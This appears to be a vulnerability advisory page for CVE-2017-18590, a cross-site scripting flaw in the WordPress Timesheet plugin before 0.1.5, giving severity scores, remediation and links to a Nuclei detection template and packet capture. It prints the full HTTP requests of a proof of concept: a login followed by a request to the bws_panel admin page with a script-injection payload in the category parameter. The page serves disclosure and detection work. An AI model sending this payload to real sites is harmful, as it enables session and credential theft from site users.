🔙 목록으로 돌아가기

CVE-2017-18590: Timesheet Plugin < 0.1.5 - Cross-Site Scripting

TitleTimesheet Plugin < 0.1.5 - Cross-Site Scripting
AuthorSplint3r7
SeverityMedium
ImpactAuthenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
RemediationUpdate to version 0.1.5 or later.
CVSS Score6.1
EPSS Score0.00075
CVE IDCVE-2017-18590
CWE IDCWE-79
Tags cve cve2017 wordpress wp wp-plugin bws-promobar xss authenticated timesheet vuln

🔍 Vulnerability Description

The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=R1hQwK&pwd=ZkiIKK&wp-submit=Log+In
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-18590.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-18590.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A